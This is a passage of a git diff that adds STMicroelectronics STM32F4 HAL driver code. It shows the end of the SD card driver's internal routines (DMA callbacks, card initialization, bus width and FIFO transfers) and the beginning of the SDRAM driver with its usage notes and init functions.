+ hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif + } + } + + /* Disable the DMA transfer for transmit request by setting the DMAEN bit + in the SD DCTRL register */ + hsd->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) + hsd->RxCpltCallback(hsd); +#else + HAL_SD_RxCpltCallback(hsd); +#endif +} + +/** + * @brief DMA SD communication error callback + * @param hdma: DMA handle + * @retval None + */ +static void SD_DMAError(DMA_HandleTypeDef *hdma) +{ + SD_HandleTypeDef* hsd = (SD_HandleTypeDef* )(hdma->Parent); + HAL_SD_CardStateTypeDef CardState; + uint32_t RxErrorCode, TxErrorCode; + + /* if DMA error is FIFO error ignore it */ + if(HAL_DMA_GetError(hdma) != HAL_DMA_ERROR_FE) + { + RxErrorCode = hsd->hdmarx->ErrorCode; + TxErrorCode = hsd->hdmatx->ErrorCode; + if((RxErrorCode == HAL_DMA_ERROR_TE) || (TxErrorCode == HAL_DMA_ERROR_TE)) + { + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_FLAGS); + + /* Disable All interrupts */ + __HAL_SD_DISABLE_IT(hsd, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); + + hsd->ErrorCode |= HAL_SD_ERROR_DMA; + CardState = HAL_SD_GetCardState(hsd); + if((CardState == HAL_SD_CARD_RECEIVING) || (CardState == HAL_SD_CARD_SENDING)) + { + hsd->ErrorCode |= SDMMC_CmdStopTransfer(hsd->Instance); + } + + hsd->State= HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + } + +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) + hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif + } +} + +/** + * @brief DMA SD Tx Abort callback + * @param hdma: DMA handle + * @retval None + */ +static void SD_DMATxAbort(DMA_HandleTypeDef *hdma) +{ + SD_HandleTypeDef* hsd = (SD_HandleTypeDef* )(hdma->Parent); + HAL_SD_CardStateTypeDef CardState; + + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + CardState = HAL_SD_GetCardState(hsd); + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + if((CardState == HAL_SD_CARD_RECEIVING) || (CardState == HAL_SD_CARD_SENDING)) + { + hsd->ErrorCode |= SDMMC_CmdStopTransfer(hsd->Instance); + } + + if(hsd->ErrorCode == HAL_SD_ERROR_NONE) + { +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) + hsd->AbortCpltCallback(hsd); +#else + HAL_SD_AbortCallback(hsd); +#endif + } + else + { +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) + hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif + } +} + +/** + * @brief DMA SD Rx Abort callback + * @param hdma: DMA handle + * @retval None + */ +static void SD_DMARxAbort(DMA_HandleTypeDef *hdma) +{ + SD_HandleTypeDef* hsd = (SD_HandleTypeDef* )(hdma->Parent); + HAL_SD_CardStateTypeDef CardState; + + /* Clear All flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + CardState = HAL_SD_GetCardState(hsd); + hsd->State = HAL_SD_STATE_READY; + hsd->Context = SD_CONTEXT_NONE; + if((CardState == HAL_SD_CARD_RECEIVING) || (CardState == HAL_SD_CARD_SENDING)) + { + hsd->ErrorCode |= SDMMC_CmdStopTransfer(hsd->Instance); + } + + if(hsd->ErrorCode == HAL_SD_ERROR_NONE) + { +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) + hsd->AbortCpltCallback(hsd); +#else + HAL_SD_AbortCallback(hsd); +#endif + } + else + { +#if (USE_HAL_SD_REGISTER_CALLBACKS == 1) + hsd->ErrorCallback(hsd); +#else + HAL_SD_ErrorCallback(hsd); +#endif + } +} + +/** + * @brief Initializes the sd card. + * @param hsd: Pointer to SD handle + * @retval SD Card error state + */ +static uint32_t SD_InitCard(SD_HandleTypeDef *hsd) +{ + HAL_SD_CardCSDTypeDef CSD; + uint32_t errorstate; + uint16_t sd_rca = 1U; + + /* Check the power State */ + if(SDIO_GetPowerState(hsd->Instance) == 0U) + { + /* Power off */ + return HAL_SD_ERROR_REQUEST_NOT_APPLICABLE; + } + + if(hsd->SdCard.CardType != CARD_SECURED) + { + /* Send CMD2 ALL_SEND_CID */ + errorstate = SDMMC_CmdSendCID(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + else + { + /* Get Card identification number data */ + hsd->CID[0U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP1); + hsd->CID[1U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP2); + hsd->CID[2U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP3); + hsd->CID[3U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP4); + } + } + + if(hsd->SdCard.CardType != CARD_SECURED) + { + /* Send CMD3 SET_REL_ADDR with argument 0 */ + /* SD Card publishes its RCA. */ + errorstate = SDMMC_CmdSetRelAdd(hsd->Instance, &sd_rca); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + } + if(hsd->SdCard.CardType != CARD_SECURED) + { + /* Get the SD card RCA */ + hsd->SdCard.RelCardAdd = sd_rca; + + /* Send CMD9 SEND_CSD with argument as card's RCA */ + errorstate = SDMMC_CmdSendCSD(hsd->Instance, (uint32_t)(hsd->SdCard.RelCardAdd << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + else + { + /* Get Card Specific Data */ + hsd->CSD[0U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP1); + hsd->CSD[1U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP2); + hsd->CSD[2U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP3); + hsd->CSD[3U] = SDIO_GetResponse(hsd->Instance, SDIO_RESP4); + } + } + + /* Get the Card Class */ + hsd->SdCard.Class = (SDIO_GetResponse(hsd->Instance, SDIO_RESP2) >> 20U); + + /* Get CSD parameters */ + if (HAL_SD_GetCardCSD(hsd, &CSD) != HAL_OK) + { + return HAL_SD_ERROR_UNSUPPORTED_FEATURE; + } + + /* Select the Card */ + errorstate = SDMMC_CmdSelDesel(hsd->Instance, (uint32_t)(((uint32_t)hsd->SdCard.RelCardAdd) << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* Configure SDIO peripheral interface */ + (void)SDIO_Init(hsd->Instance, hsd->Init); + + /* All cards are initialized */ + return HAL_SD_ERROR_NONE; +} + +/** + * @brief Enquires cards about their operating voltage and configures clock + * controls and stores SD information that will be needed in future + * in the SD handle. + * @param hsd: Pointer to SD handle + * @retval error state + */ +static uint32_t SD_PowerON(SD_HandleTypeDef *hsd) +{ + __IO uint32_t count = 0U; + uint32_t response = 0U, validvoltage = 0U; + uint32_t errorstate; + + /* CMD0: GO_IDLE_STATE */ + errorstate = SDMMC_CmdGoIdleState(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* CMD8: SEND_IF_COND: Command available only on V2.0 cards */ + errorstate = SDMMC_CmdOperCond(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->SdCard.CardVersion = CARD_V1_X; + /* CMD0: GO_IDLE_STATE */ + errorstate = SDMMC_CmdGoIdleState(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + } + else + { + hsd->SdCard.CardVersion = CARD_V2_X; + } + + if( hsd->SdCard.CardVersion == CARD_V2_X) + { + /* SEND CMD55 APP_CMD with RCA as 0 */ + errorstate = SDMMC_CmdAppCommand(hsd->Instance, 0); + if(errorstate != HAL_SD_ERROR_NONE) + { + return HAL_SD_ERROR_UNSUPPORTED_FEATURE; + } + } + /* SD CARD */ + /* Send ACMD41 SD_APP_OP_COND with Argument 0x80100000 */ + while((count < SDMMC_MAX_VOLT_TRIAL) && (validvoltage == 0U)) + { + /* SEND CMD55 APP_CMD with RCA as 0 */ + errorstate = SDMMC_CmdAppCommand(hsd->Instance, 0); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* Send CMD41 */ + errorstate = SDMMC_CmdAppOperCommand(hsd->Instance, SDMMC_VOLTAGE_WINDOW_SD | SDMMC_HIGH_CAPACITY | SD_SWITCH_1_8V_CAPACITY); + if(errorstate != HAL_SD_ERROR_NONE) + { + return HAL_SD_ERROR_UNSUPPORTED_FEATURE; + } + + /* Get command response */ + response = SDIO_GetResponse(hsd->Instance, SDIO_RESP1); + + /* Get operating voltage*/ + validvoltage = (((response >> 31U) == 1U) ? 1U : 0U); + + count++; + } + + if(count >= SDMMC_MAX_VOLT_TRIAL) + { + return HAL_SD_ERROR_INVALID_VOLTRANGE; + } + + if((response & SDMMC_HIGH_CAPACITY) == SDMMC_HIGH_CAPACITY) /* (response &= SD_HIGH_CAPACITY) */ + { + hsd->SdCard.CardType = CARD_SDHC_SDXC; + } + else + { + hsd->SdCard.CardType = CARD_SDSC; + } + + + return HAL_SD_ERROR_NONE; +} + +/** + * @brief Turns the SDIO output signals off. + * @param hsd: Pointer to SD handle + * @retval None + */ +static void SD_PowerOFF(SD_HandleTypeDef *hsd) +{ + /* Set Power State to OFF */ + (void)SDIO_PowerState_OFF(hsd->Instance); +} + +/** + * @brief Send Status info command. + * @param hsd: pointer to SD handle + * @param pSDstatus: Pointer to the buffer that will contain the SD card status + * SD Status register) + * @retval error state + */ +static uint32_t SD_SendSDStatus(SD_HandleTypeDef *hsd, uint32_t *pSDstatus) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t count; + uint32_t *pData = pSDstatus; + + /* Check SD response */ + if((SDIO_GetResponse(hsd->Instance, SDIO_RESP1) & SDMMC_CARD_LOCKED) == SDMMC_CARD_LOCKED) + { + return HAL_SD_ERROR_LOCK_UNLOCK_FAILED; + } + + /* Set block size for card if it is not equal to current block size for card */ + errorstate = SDMMC_CmdBlockLength(hsd->Instance, 64U); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= HAL_SD_ERROR_NONE; + return errorstate; + } + + /* Send CMD55 */ + errorstate = SDMMC_CmdAppCommand(hsd->Instance, (uint32_t)(hsd->SdCard.RelCardAdd << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= HAL_SD_ERROR_NONE; + return errorstate; + } + + /* Configure the SD DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = 64U; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_64B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + /* Send ACMD13 (SD_APP_STAUS) with argument as card's RCA */ + errorstate = SDMMC_CmdStatusRegister(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + hsd->ErrorCode |= HAL_SD_ERROR_NONE; + return errorstate; + } + + /* Get status data */ + while(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DBCKEND)) + { + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXFIFOHF)) + { + for(count = 0U; count < 8U; count++) + { + *pData = SDIO_ReadFIFO(hsd->Instance); + pData++; + } + } + + if((HAL_GetTick() - tickstart) >= SDMMC_DATATIMEOUT) + { + return HAL_SD_ERROR_TIMEOUT; + } + } + + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DTIMEOUT)) + { + return HAL_SD_ERROR_DATA_TIMEOUT; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL)) + { + return HAL_SD_ERROR_DATA_CRC_FAIL; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR)) + { + return HAL_SD_ERROR_RX_OVERRUN; + } + else + { + /* Nothing to do */ + } + + while ((__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXDAVL))) + { + *pData = SDIO_ReadFIFO(hsd->Instance); + pData++; + + if((HAL_GetTick() - tickstart) >= SDMMC_DATATIMEOUT) + { + return HAL_SD_ERROR_TIMEOUT; + } + } + + /* Clear all the static status flags*/ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + return HAL_SD_ERROR_NONE; +} + +/** + * @brief Returns the current card's status. + * @param hsd: Pointer to SD handle + * @param pCardStatus: pointer to the buffer that will contain the SD card + * status (Card Status register) + * @retval error state + */ +static uint32_t SD_SendStatus(SD_HandleTypeDef *hsd, uint32_t *pCardStatus) +{ + uint32_t errorstate; + + if(pCardStatus == NULL) + { + return HAL_SD_ERROR_PARAM; + } + + /* Send Status command */ + errorstate = SDMMC_CmdSendStatus(hsd->Instance, (uint32_t)(hsd->SdCard.RelCardAdd << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* Get SD card status */ + *pCardStatus = SDIO_GetResponse(hsd->Instance, SDIO_RESP1); + + return HAL_SD_ERROR_NONE; +} + +/** + * @brief Enables the SDIO wide bus mode. + * @param hsd: pointer to SD handle + * @retval error state + */ +static uint32_t SD_WideBus_Enable(SD_HandleTypeDef *hsd) +{ + uint32_t scr[2U] = {0U, 0U}; + uint32_t errorstate; + + if((SDIO_GetResponse(hsd->Instance, SDIO_RESP1) & SDMMC_CARD_LOCKED) == SDMMC_CARD_LOCKED) + { + return HAL_SD_ERROR_LOCK_UNLOCK_FAILED; + } + + /* Get SCR Register */ + errorstate = SD_FindSCR(hsd, scr); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* If requested card supports wide bus operation */ + if((scr[1U] & SDMMC_WIDE_BUS_SUPPORT) != SDMMC_ALLZERO) + { + /* Send CMD55 APP_CMD with argument as card's RCA.*/ + errorstate = SDMMC_CmdAppCommand(hsd->Instance, (uint32_t)(hsd->SdCard.RelCardAdd << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* Send ACMD6 APP_CMD with argument as 2 for wide bus mode */ + errorstate = SDMMC_CmdBusWidth(hsd->Instance, 2U); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + return HAL_SD_ERROR_NONE; + } + else + { + return HAL_SD_ERROR_REQUEST_NOT_APPLICABLE; + } +} + +/** + * @brief Disables the SDIO wide bus mode. + * @param hsd: Pointer to SD handle + * @retval error state + */ +static uint32_t SD_WideBus_Disable(SD_HandleTypeDef *hsd) +{ + uint32_t scr[2U] = {0U, 0U}; + uint32_t errorstate; + + if((SDIO_GetResponse(hsd->Instance, SDIO_RESP1) & SDMMC_CARD_LOCKED) == SDMMC_CARD_LOCKED) + { + return HAL_SD_ERROR_LOCK_UNLOCK_FAILED; + } + + /* Get SCR Register */ + errorstate = SD_FindSCR(hsd, scr); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* If requested card supports 1 bit mode operation */ + if((scr[1U] & SDMMC_SINGLE_BUS_SUPPORT) != SDMMC_ALLZERO) + { + /* Send CMD55 APP_CMD with argument as card's RCA */ + errorstate = SDMMC_CmdAppCommand(hsd->Instance, (uint32_t)(hsd->SdCard.RelCardAdd << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* Send ACMD6 APP_CMD with argument as 0 for single bus mode */ + errorstate = SDMMC_CmdBusWidth(hsd->Instance, 0U); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + return HAL_SD_ERROR_NONE; + } + else + { + return HAL_SD_ERROR_REQUEST_NOT_APPLICABLE; + } +} + + +/** + * @brief Finds the SD card SCR register value. + * @param hsd: Pointer to SD handle + * @param pSCR: pointer to the buffer that will contain the SCR value + * @retval error state + */ +static uint32_t SD_FindSCR(SD_HandleTypeDef *hsd, uint32_t *pSCR) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t index = 0U; + uint32_t tempscr[2U] = {0U, 0U}; + uint32_t *scr = pSCR; + + /* Set Block Size To 8 Bytes */ + errorstate = SDMMC_CmdBlockLength(hsd->Instance, 8U); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + /* Send CMD55 APP_CMD with argument as card's RCA */ + errorstate = SDMMC_CmdAppCommand(hsd->Instance, (uint32_t)((hsd->SdCard.RelCardAdd) << 16U)); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = 8U; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_8B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hsd->Instance, &config); + + /* Send ACMD51 SD_APP_SEND_SCR with argument as 0 */ + errorstate = SDMMC_CmdSendSCR(hsd->Instance); + if(errorstate != HAL_SD_ERROR_NONE) + { + return errorstate; + } + + while(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT)) + { + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXDAVL)) + { + *(tempscr + index) = SDIO_ReadFIFO(hsd->Instance); + index++; + } + else if(!__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXACT)) + { + break; + } + + if((HAL_GetTick() - tickstart) >= SDMMC_DATATIMEOUT) + { + return HAL_SD_ERROR_TIMEOUT; + } + } + + if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DTIMEOUT)) + { + __HAL_SD_CLEAR_FLAG(hsd, SDIO_FLAG_DTIMEOUT); + + return HAL_SD_ERROR_DATA_TIMEOUT; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_DCRCFAIL)) + { + __HAL_SD_CLEAR_FLAG(hsd, SDIO_FLAG_DCRCFAIL); + + return HAL_SD_ERROR_DATA_CRC_FAIL; + } + else if(__HAL_SD_GET_FLAG(hsd, SDIO_FLAG_RXOVERR)) + { + __HAL_SD_CLEAR_FLAG(hsd, SDIO_FLAG_RXOVERR); + + return HAL_SD_ERROR_RX_OVERRUN; + } + else + { + /* No error flag set */ + /* Clear all the static flags */ + __HAL_SD_CLEAR_FLAG(hsd, SDIO_STATIC_DATA_FLAGS); + + *scr = (((tempscr[1] & SDMMC_0TO7BITS) << 24) | ((tempscr[1] & SDMMC_8TO15BITS) << 8) |\ + ((tempscr[1] & SDMMC_16TO23BITS) >> 8) | ((tempscr[1] & SDMMC_24TO31BITS) >> 24)); + scr++; + *scr = (((tempscr[0] & SDMMC_0TO7BITS) << 24) | ((tempscr[0] & SDMMC_8TO15BITS) << 8) |\ + ((tempscr[0] & SDMMC_16TO23BITS) >> 8) | ((tempscr[0] & SDMMC_24TO31BITS) >> 24)); + + } + + return HAL_SD_ERROR_NONE; +} + +/** + * @brief Wrap up reading in non-blocking mode. + * @param hsd: pointer to a SD_HandleTypeDef structure that contains + * the configuration information. + * @retval None + */ +static void SD_Read_IT(SD_HandleTypeDef *hsd) +{ + uint32_t count, data, dataremaining; + uint8_t* tmp; + + tmp = hsd->pRxBuffPtr; + dataremaining = hsd->RxXferSize; + + if (dataremaining > 0U) + { + /* Read data from SDIO Rx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = SDIO_ReadFIFO(hsd->Instance); + *tmp = (uint8_t)(data & 0xFFU); + tmp++; + dataremaining--; + *tmp = (uint8_t)((data >> 8U) & 0xFFU); + tmp++; + dataremaining--; + *tmp = (uint8_t)((data >> 16U) & 0xFFU); + tmp++; + dataremaining--; + *tmp = (uint8_t)((data >> 24U) & 0xFFU); + tmp++; + dataremaining--; + } + + hsd->pRxBuffPtr = tmp; + hsd->RxXferSize = dataremaining; + } +} + +/** + * @brief Wrap up writing in non-blocking mode. + * @param hsd: pointer to a SD_HandleTypeDef structure that contains + * the configuration information. + * @retval None + */ +static void SD_Write_IT(SD_HandleTypeDef *hsd) +{ + uint32_t count, data, dataremaining; + uint8_t* tmp; + + tmp = hsd->pTxBuffPtr; + dataremaining = hsd->TxXferSize; + + if (dataremaining > 0U) + { + /* Write data to SDIO Tx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = (uint32_t)(*tmp); + tmp++; + dataremaining--; + data |= ((uint32_t)(*tmp) << 8U); + tmp++; + dataremaining--; + data |= ((uint32_t)(*tmp) << 16U); + tmp++; + dataremaining--; + data |= ((uint32_t)(*tmp) << 24U); + tmp++; + dataremaining--; + (void)SDIO_WriteFIFO(hsd->Instance, &data); + } + + hsd->pTxBuffPtr = tmp; + hsd->TxXferSize = dataremaining; + } +} + +/** + * @} + */ + +#endif /* HAL_SD_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* SDIO */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sdram.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sdram.c new file mode 100644 index 000000000..da34f47a8 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_sdram.c @@ -0,0 +1,1102 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_sdram.c + * @author MCD Application Team + * @brief SDRAM HAL module driver. + * This file provides a generic firmware to drive SDRAM memories mounted + * as external device. + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This driver is a generic layered driver which contains a set of APIs used to + control SDRAM memories. It uses the FMC layer functions to interface + with SDRAM devices. + The following sequence should be followed to configure the FMC to interface + with SDRAM memories: + + (#) Declare a SDRAM_HandleTypeDef handle structure, for example: + SDRAM_HandleTypeDef hdsram + + (++) Fill the SDRAM_HandleTypeDef handle "Init" field with the allowed + values of the structure member. + + (++) Fill the SDRAM_HandleTypeDef handle "Instance" field with a predefined + base register instance for NOR or SDRAM device + + (#) Declare a FMC_SDRAM_TimingTypeDef structure; for example: + FMC_SDRAM_TimingTypeDef Timing; + and fill its fields with the allowed values of the structure member. + + (#) Initialize the SDRAM Controller by calling the function HAL_SDRAM_Init(). This function + performs the following sequence: + + (##) MSP hardware layer configuration using the function HAL_SDRAM_MspInit() + (##) Control register configuration using the FMC SDRAM interface function + FMC_SDRAM_Init() + (##) Timing register configuration using the FMC SDRAM interface function + FMC_SDRAM_Timing_Init() + (##) Program the SDRAM external device by applying its initialization sequence + according to the device plugged in your hardware. This step is mandatory + for accessing the SDRAM device. + + (#) At this stage you can perform read/write accesses from/to the memory connected + to the SDRAM Bank. You can perform either polling or DMA transfer using the + following APIs: + (++) HAL_SDRAM_Read()/HAL_SDRAM_Write() for polling read/write access + (++) HAL_SDRAM_Read_DMA()/HAL_SDRAM_Write_DMA() for DMA read/write transfer + + (#) You can also control the SDRAM device by calling the control APIs HAL_SDRAM_WriteOperation_Enable()/ + HAL_SDRAM_WriteOperation_Disable() to respectively enable/disable the SDRAM write operation or + the function HAL_SDRAM_SendCommand() to send a specified command to the SDRAM + device. The command to be sent must be configured with the FMC_SDRAM_CommandTypeDef + structure. + + (#) You can continuously monitor the SDRAM device HAL state by calling the function + HAL_SDRAM_GetState() + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_SDRAM_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions @ref HAL_SDRAM_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) MspInitCallback : SDRAM MspInit. + (+) MspDeInitCallback : SDRAM MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_SDRAM_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) MspInitCallback : SDRAM MspInit. + (+) MspDeInitCallback : SDRAM MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the @ref HAL_SDRAM_Init and if the state is HAL_SDRAM_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_SDRAM_Init + and @ref HAL_SDRAM_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the @ref HAL_SDRAM_Init and @ref HAL_SDRAM_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_SDRAM_RegisterCallback before calling @ref HAL_SDRAM_DeInit + or @ref HAL_SDRAM_Init function. + + When The compilation define USE_HAL_SDRAM_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup SDRAM SDRAM + * @brief SDRAM driver modules + * @{ + */ +#ifdef HAL_SDRAM_MODULE_ENABLED +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup SDRAM_Exported_Functions SDRAM Exported Functions + * @{ + */ + +/** @defgroup SDRAM_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### SDRAM Initialization and de_initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to initialize/de-initialize + the SDRAM memory + +@endverbatim + * @{ + */ + +/** + * @brief Performs the SDRAM device initialization sequence. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @param Timing Pointer to SDRAM control timing structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_Init(SDRAM_HandleTypeDef *hsdram, FMC_SDRAM_TimingTypeDef *Timing) +{ + /* Check the SDRAM handle parameter */ + if(hsdram == NULL) + { + return HAL_ERROR; + } + + if(hsdram->State == HAL_SDRAM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hsdram->Lock = HAL_UNLOCKED; +#if (USE_HAL_SDRAM_REGISTER_CALLBACKS == 1) + if(hsdram->MspInitCallback == NULL) + { + hsdram->MspInitCallback = HAL_SDRAM_MspInit; + } + hsdram->RefreshErrorCallback = HAL_SDRAM_RefreshErrorCallback; + hsdram->DmaXferCpltCallback = HAL_SDRAM_DMA_XferCpltCallback; + hsdram->DmaXferErrorCallback = HAL_SDRAM_DMA_XferErrorCallback; + + /* Init the low level hardware */ + hsdram->MspInitCallback(hsdram); +#else + /* Initialize the low level hardware (MSP) */ + HAL_SDRAM_MspInit(hsdram); +#endif + } + + /* Initialize the SDRAM controller state */ + hsdram->State = HAL_SDRAM_STATE_BUSY; + + /* Initialize SDRAM control Interface */ + FMC_SDRAM_Init(hsdram->Instance, &(hsdram->Init)); + + /* Initialize SDRAM timing Interface */ + FMC_SDRAM_Timing_Init(hsdram->Instance, Timing, hsdram->Init.SDBank); + + /* Update the SDRAM controller state */ + hsdram->State = HAL_SDRAM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Perform the SDRAM device initialization sequence. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure that contains + * the configuration information for SDRAM module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_SDRAM_DeInit(SDRAM_HandleTypeDef *hsdram) +{ +#if (USE_HAL_SDRAM_REGISTER_CALLBACKS == 1) + if(hsdram->MspDeInitCallback == NULL) + { + hsdram->MspDeInitCallback = HAL_SDRAM_MspDeInit; + } + + /* DeInit the low level hardware */ + hsdram->MspDeInitCallback(hsdram); +#else + /* Initialize the low level hardware (MSP) */ + HAL_SDRAM_MspDeInit(hsdram); +#endif + + /* Configure the SDRAM registers with their reset values */ + FMC_SDRAM_DeInit(hsdram->Instance, hsdram->Init.SDBank); + + /* Reset the SDRAM controller state */ + hsdram->State = HAL_SDRAM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hsdram); + + return HAL_OK; +} + +/** + * @brief SDRAM MSP Init. + * @param hsdram pointer to a SDRAM_HandleTypeDef structure 